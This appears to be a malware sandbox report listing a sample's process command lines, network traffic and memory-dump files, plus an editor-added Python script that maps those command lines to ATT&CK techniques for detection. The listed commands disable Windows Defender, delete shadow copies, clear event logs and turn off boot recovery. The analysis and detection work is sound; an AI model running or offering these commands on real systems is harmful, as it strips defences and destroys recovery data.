C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true
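
The command lines above are the sample's whole impairment chain: stop and disable the listed services (net stop, then sc config start= disabled), turn Defender off through policy keys and by writing Start=4 directly on the WinDefend, WdFilter, WdBoot, WdNisDrv, WdNisSvc and SecurityHealthService services (a path that never touches sc.exe), switch off the Defender ETW autologgers and scheduled tasks, strip signatures with MpCmdRun, delete shadow copies twice over (vssadmin and wmic), clear the System, Security and Application logs, and disable Windows recovery with bcdedit. The Python below is an added example by the editor, not sandbox output and not the sandbox vendor's signatures: a small rule set that classifies such process command lines into ATT&CK techniques (the mapping is the editor's) and collects the concrete services, logs and Defender settings each one targets. SAMPLE is a subset of the command lines copied from the Processes section; the patterns are applied with search(), so the cmd.exe /c wrapper and the net.exe -> net1.exe relay need no special handling.

```python
"""Classify the command lines from the Processes section of this report.

Added example (the editor's rules and ATT&CK mapping, not the sandbox vendor's
signatures).  SAMPLE is a subset of the command lines copied from the report.
"""
import re
from collections import Counter

SAMPLE = r'''
net.exe stop "SamSs" /y
C:\Windows\system32\net1 stop "SamSs" /y
net.exe stop "SDRSVC" /y
net.exe stop "SstpSvc" /y
net.exe stop "UI0Detect" /y
net.exe stop "vmicvss" /y
net.exe stop "VSS" /y
net.exe stop "wbengine" /y
net.exe stop "WebClient" /y
net.exe stop "UnistoreSvc_13659" /y
sc.exe config "VSS" start= disabled
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy delete
wevtutil.exe cl security
bcdedit.exe /set {default} recoveryenabled no
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
powershell Set-MpPreference -DisableIOAVProtection $true
'''

# (rule, ATT&CK technique, regex).  The named group "item" captures the service, log,
# task or registry value the command targets.  First matching rule wins.
RULES = [
    ("service_stop", "T1489", r'\bnet1?(?:\.exe)?\s+stop\s+"?(?P<item>[^"\s]+)"?'),
    ("service_disable_sc", "T1562.001", r'\bsc(?:\.exe)?\s+config\s+"?(?P<item>[^"\s]+)"?\s+start=\s*disabled'),
    # Start=4 (SERVICE_DISABLED) written straight into the registry: no sc.exe involved.
    ("service_disable_reg", "T1562.001", r'\breg(?:\.exe)?\s+add\s+"HKLM\\System\\CurrentControlSet\\Services\\(?P<item>[^"\\]+)"\s+/v\s+"Start"\s+/t\s+REG_DWORD\s+/d\s+"4"'),
    ("defender_policy", "T1562.001", r'\breg(?:\.exe)?\s+(?:add|delete)\s+"HKLM\\Software\\Policies\\Microsoft\\Windows Defender(?:\\[^"]*)?"(?:\s+/v\s+"(?P<item>[^"]+)")?'),
    ("defender_etw_logger", "T1562.006", r'\breg(?:\.exe)?\s+add\s+"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\(?P<item>Defender[^"\\]*)"'),
    ("defender_task_disable", "T1562.001", r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"(?P<item>Microsoft\\Windows\\(?:Windows Defender|ExploitGuard)\\[^"]+)"\s+/Disable'),
    ("defender_autorun_remove", "T1562.001", r'\breg(?:\.exe)?\s+delete\s+"[^"]*\\CurrentVersion\\(?:Explorer\\StartupApproved\\)?Run"\s+/v\s+"(?P<item>Windows ?Defender)"'),
    ("shadow_copy_delete", "T1490", r'\bvssadmin(?:\.exe)?\s+delete\s+shadows|\bwmic(?:\.exe)?\s+shadowcopy\s+delete'),
    ("event_log_clear", "T1070.001", r'\bwevtutil(?:\.exe)?\s+cl\s+(?P<item>\S+)'),
    ("boot_recovery_disable", "T1490", r'\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(?P<item>recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)'),
    ("defender_sig_removal", "T1562.001", r'\bMpCmdRun(?:\.exe)?"?\s+-RemoveDefinitions'),
    ("defender_mppreference", "T1562.001", r'\bSet-MpPreference\s+-(?P<item>Disable\w+)\s+\$true'),
]
COMPILED = [(name, tech, re.compile(pat, re.I)) for name, tech, pat in RULES]


def classify(cmdline):
    """First matching rule as (rule, technique, item), or None if nothing fires."""
    for name, tech, rx in COMPILED:
        m = rx.search(cmdline)
        if m:
            return name, tech, m.groupdict().get("item")
    return None


def triage(cmdlines):
    """Technique counts (one per process) plus de-duplicated targets per rule."""
    hits, targets, unmatched = Counter(), {}, []
    for line in (l.strip() for l in cmdlines):
        if not line:
            continue
        hit = classify(line)
        if hit is None:
            unmatched.append(line)  # surface unknown variants instead of dropping them
            continue
        name, tech, item = hit
        hits[tech] += 1
        if item:
            targets.setdefault(name, set()).add(item)
    union = lambda *keys: sorted(set().union(*(targets.get(k, set()) for k in keys)), key=str.lower)
    return {
        "techniques": dict(hits),
        "services_stopped": union("service_stop"),
        "services_disabled": union("service_disable_sc", "service_disable_reg"),
        "logs_cleared": union("event_log_clear"),
        "defender_values": union("defender_policy", "defender_mppreference"),
        "unmatched": unmatched,
    }


def triage_sample():
    """Run the rules over the report's own command lines."""
    return triage(SAMPLE.splitlines())


if __name__ == "__main__":
    import json
    print(json.dumps(triage_sample(), indent=2))
```

Counts are per process, so the net.exe and net1.exe entries for SamSs both count under T1489 while the target lists are de-duplicated; anything that matches no rule is returned under "unmatched" rather than silently dropped, which is the field to watch when a new build changes its syntax. The point worth carrying into production rules is that this sample disables services two ways: a detection keyed only on "sc config ... start= disabled" sees VSS and the other backup services but misses the "reg add ... Services\WinDefend /v Start /d 4" writes that actually switch Defender off, so the rule set covers both.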

Network

Country  Destination        Domain            Proto
US       52.109.8.19:443    -                 tcp
US       8.8.8.8:53         time.windows.com  udp
NL       40.119.148.38:123  time.windows.com  udp

Files

memory/1180-115-0x0000000000000000-mapping.dmp

memory/1040-116-0x0000000000000000-mapping.dmp

memory/1152-117-0x0000000000000000-mapping.dmp

memory/3000-118-0x0000000000000000-mapping.dmp

memory/1304-119-0x0000000000000000-mapping.dmp

memory/656-120-0x0000000000000000-mapping.dmp

memory/652-121-0x0000000000000000-mapping.dmp

memory/1676-122-0x0000000000000000-mapping.dmp

memory/4088-123-0x0000000000000000-mapping.dmp

memory/3676-124-0x0000000000000000-mapping.dmp

memory/3144-125-0x0000000000000000-mapping.dmp

memory/4056-126-0x0000000000000000-mapping.dmp

memory/1784-127-0x0000000000000000-mapping.dmp

memory/1088-128-0x0000000000000000-mapping.dmp

memory/408-129-0x0000000000000000-mapping.dmp

memory/444-130-0x0000000000000000-mapping.dmp

memory/2852-131-0x0000000000000000-mapping.dmp

memory/3852-132-0x0000000000000000-mapping.dmp

memory/1496-133-0x0000000000000000-mapping.dmp

memory/2896-134-0x0000000000000000-mapping.dmp

memory/1672-135-0x0000000000000000-mapping.dmp

memory/2448-136-0x0000000000000000-mapping.dmp

memory/2408-137-0x0000000000000000-mapping.dmp

memory/1680-138-0x0000000000000000-mapping.dmp

memory/3980-139-0x0000000000000000-mapping.dmp

memory/2128-140-0x0000000000000000-mapping.dmp

memory/2240-141-0x0000000000000000-mapping.dmp

memory/4024-142-0x0000000000000000-mapping.dmp

memory/3040-143-0x0000000000000000-mapping.dmp

memory/1960-144-0x0000000000000000-mapping.dmp

memory/1632-145-0x0000000000000000-mapping.dmp

memory/1976-146-0x0000000000000000-mapping.dmp

memory/3636-147-0x0000000000000000-mapping.dmp

memory/3656-148-0x0000000000000000-mapping.dmp

memory/2148-149-0x0000000000000000-mapping.dmp

memory/1432-150-0x0000000000000000-mapping.dmp

memory/2912-151-0x0000000000000000-mapping.dmp

memory/1040-152-0x0000000000000000-mapping.dmp

memory/2012-153-0x0000000000000000-mapping.dmp

memory/2252-154-0x0000000000000000-mapping.dmp

memory/2980-155-0x0000000000000000-mapping.dmp

memory/1676-156-0x0000000000000000-mapping.dmp

memory/1400-157-0x0000000000000000-mapping.dmp

memory/1016-158-0x0000000000000000-mapping.dmp

memory/2220-159-0x0000000000000000-mapping.dmp

memory/1072-160-0x0000000000000000-mapping.dmp

memory/444-161-0x0000000000000000-mapping.dmp

memory/668-162-0x0000000000000000-mapping.dmp

memory/1720-163-0x0000000000000000-mapping.dmp

memory/1284-164-0x0000000000000000-mapping.dmp

memory/2792-165-0x0000000000000000-mapping.dmp

memory/3976-166-0x0000000000000000-mapping.dmp

memory/1836-167-0x0000000000000000-mapping.dmp

memory/1848-168-0x0000000000000000-mapping.dmp

memory/2736-169-0x0000000000000000-mapping.dmp

memory/2964-170-0x0000000000000000-mapping.dmp

memory/2280-171-0x0000000000000000-mapping.dmp

memory/372-172-0x0000000000000000-mapping.dmp

memory/3220-173-0x0000000000000000-mapping.dmp

memory/3968-174-0x0000000000000000-mapping.dmp

memory/3068-175-0x0000000000000000-mapping.dmp

memory/3864-176-0x0000000000000000-mapping.dmp

memory/3208-177-0x0000000000000000-mapping.dmp

memory/1980-178-0x0000000000000000-mapping.dmp

memory/1404-179-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-180-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-181-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-182-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-183-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-184-0x000001B0D74E0000-0x000001B0D7502000-memory.dmp

memory/1404-185-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-186-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-188-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-187-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-189-0x000001B0F1B00000-0x000001B0F1B76000-memory.dmp

memory/1404-190-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-212-0x000001B0EFA20000-0x000001B0EFA22000-memory.dmp

memory/1404-213-0x000001B0EFA23000-0x000001B0EFA25000-memory.dmp

memory/1404-214-0x000001B0EFA26000-0x000001B0EFA28000-memory.dmp

memory/1404-217-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-218-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/2076-220-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-221-0x0000025699130000-0x0000025699132000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/2076-222-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-223-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-224-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-225-0x00000256B1870000-0x00000256B1892000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5002ed500e75ed22441076ac819003
SHA1 710cc7878e499af7514b2c874ad2c7b912affbc7
SHA256 8892ad94c31cba0ad62ec86c9db78d221dd2a8a43bdf5e8014b1d7e221ad1ac7
SHA512 b5a8b0adba1bc3c1527a3fe5581e53433d1f0e59ad44003a2e7d53f1272075873ff8023ab01eea0e7c9b3e907f8249ad29fc17b7d7d0b8cc9d3c645afa1766e7

memory/2076-227-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-228-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-229-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-230-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-231-0x00000256B3A40000-0x00000256B3AB6000-memory.dmp

memory/1404-232-0x000001B0EFA28000-0x000001B0EFA29000-memory.dmp

memory/2076-233-0x00000256B18E0000-0x00000256B18E2000-memory.dmp

memory/2076-234-0x00000256B18E3000-0x00000256B18E5000-memory.dmp

memory/2076-235-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-262-0x00000256B18E8000-0x00000256B18E9000-memory.dmp

memory/2076-261-0x00000256B18E6000-0x00000256B18E8000-memory.dmp